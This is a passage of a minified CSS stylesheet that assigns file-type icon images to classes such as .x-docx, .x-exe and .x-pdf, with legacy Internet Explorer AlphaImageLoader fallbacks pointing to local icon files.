\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none 